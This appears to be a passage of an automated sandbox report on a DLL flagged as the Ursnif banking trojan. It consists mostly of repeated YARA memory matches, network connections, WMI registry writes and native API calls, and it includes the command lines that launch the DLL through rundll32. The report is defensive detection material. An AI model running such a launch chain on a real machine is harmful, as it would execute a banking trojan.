            Source: unknownHTTPS traffic detected: 172.67.69.19:443 -> 192.168.2.3:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.70:443 -> 192.168.2.3:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.186.70:443 -> 192.168.2.3:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49753 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49758 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49754 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379329065.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353519210.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452882755.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349169873.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353381101.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452739993.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311353638.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353640605.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353482543.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349379368.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299293489.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377754049.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452599143.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.425611899.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452682864.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349425307.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349209886.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.488281426.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452790659.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349342259.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349245069.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353420356.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379402147.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.378397913.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311162481.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353660162.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376670409.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310218293.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353285218.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299402333.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310401449.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310585045.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377140325.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310811687.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452941227.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298617487.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377966823.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349275169.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377030195.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311655737.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349118555.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.401300061.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299506180.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379198024.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.487540264.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.457353583.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.485787977.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298330099.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376078643.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452547670.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.442237673.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377890073.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379544002.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298892521.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353559736.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298800751.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452911252.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376494826.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6912, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6096, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001D.00000003.378625315.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377493351.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377965158.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311524136.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299067540.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379329065.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353519210.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452882755.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349169873.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353381101.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452739993.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311353638.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353640605.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353482543.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349379368.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299293489.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377754049.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452599143.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.425611899.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452682864.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349425307.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349209886.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.488281426.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452790659.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349342259.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349245069.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353420356.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379402147.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.378397913.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311162481.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353660162.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376670409.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310218293.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353285218.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299402333.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310401449.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310585045.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377140325.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.310811687.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452941227.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298617487.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.377966823.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349275169.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377030195.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.311655737.0000000005018000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.349118555.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.401300061.00000000069B8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.299506180.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379198024.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.487540264.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.457353583.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.485787977.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298330099.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376078643.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452547670.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000002.442237673.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.377890073.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000003.379544002.0000000007038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298892521.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000021.00000003.353559736.0000000004AF8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.298800751.00000000052E8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.452911252.0000000001668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000003.376494826.0000000004DD8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6912, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6096, type: MEMORY

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001996 GetProcAddress,NtCreateSection,memset,0_2_10001996
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001A44 NtMapViewOfSection,0_2_10001A44
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100023A5 NtQueryVirtualMemory,0_2_100023A5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005E5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_005E5A27
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EB1A5 NtQueryVirtualMemory,0_2_005EB1A5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0478 NtAllocateVirtualMemory,0_2_003D0478
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D04AF NtAllocateVirtualMemory,0_2_003D04AF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047F5A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,2_2_047F5A27
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047FB1A5 NtQueryVirtualMemory,2_2_047FB1A5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F204AF NtAllocateVirtualMemory,2_2_02F204AF
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F20478 NtAllocateVirtualMemory,2_2_02F20478
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04475A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_04475A27
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0447B1A5 NtQueryVirtualMemory,4_2_0447B1A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C05A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,6_2_04C05A27
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C0B1A5 NtQueryVirtualMemory,6_2_04C0B1A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C0478 NtAllocateVirtualMemory,6_2_027C0478
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C04AF NtAllocateVirtualMemory,6_2_027C04AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04635A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,9_2_04635A27
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0463B1A5 NtQueryVirtualMemory,9_2_0463B1A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_002604AF NtAllocateVirtualMemory,21_2_002604AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00260478 NtAllocateVirtualMemory,21_2_00260478
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F04AF NtAllocateVirtualMemory,29_2_030F04AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F0478 NtAllocateVirtualMemory,29_2_030F0478
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_04675A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,33_2_04675A27
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_0467B1A5 NtQueryVirtualMemory,33_2_0467B1A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D04AF NtAllocateVirtualMemory,33_2_029D04AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D0478 NtAllocateVirtualMemory,33_2_029D0478
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_02B95A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,35_2_02B95A27
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_02B9B1A5 NtQueryVirtualMemory,35_2_02B9B1A5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F00478 NtAllocateVirtualMemory,36_2_02F00478
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F004AF NtAllocateVirtualMemory,36_2_02F004AF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 37_2_04955A27 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,37_2_04955A27
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 37_2_0495B1A5 NtQueryVirtualMemory,37_2_0495B1A5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021840_2_10002184
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005E3EE10_2_005E3EE1
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005E888E0_2_005E888E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EAF800_2_005EAF80
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0A7E0_2_003D0A7E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_003D0A800_2_003D0A80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047F3EE12_2_047F3EE1
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047F888E2_2_047F888E
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_047FAF802_2_047FAF80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F20A802_2_02F20A80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_02F20A7E2_2_02F20A7E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_04473EE14_2_04473EE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0447888E4_2_0447888E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_0447AF804_2_0447AF80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C03EE16_2_04C03EE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C0888E6_2_04C0888E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_04C0AF806_2_04C0AF80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C0A7E6_2_027C0A7E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_027C0A806_2_027C0A80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_04633EE19_2_04633EE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0463888E9_2_0463888E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0463AF809_2_0463AF80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00260A7E21_2_00260A7E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_00260A8021_2_00260A80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F0A8029_2_030F0A80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 29_2_030F0A7E29_2_030F0A7E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_04673EE133_2_04673EE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_0467888E33_2_0467888E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_0467AF8033_2_0467AF80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D0A8033_2_029D0A80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 33_2_029D0A7E33_2_029D0A7E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_02B9888E35_2_02B9888E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_02B93EE135_2_02B93EE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 35_2_02B9AF8035_2_02B9AF80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F00A7E36_2_02F00A7E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 36_2_02F00A8036_2_02F00A80
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 37_2_0495888E37_2_0495888E
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 37_2_04953EE137_2_04953EE1
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 37_2_0495AF8037_2_0495AF80
            Source: direction.dllStatic PE information: Number of sections : 27 > 10
            Source: direction.dllStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
            Source: direction.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal76.troj.winDLL@72/174@25/6
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_005EA65C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_005EA65C
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DFF4812447DAB93837.TMPJump to behavior
            Source: direction.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
            Source: direction.dllVirustotal: Detection: 22%
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\direction.dll'
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\direction.dll',#1
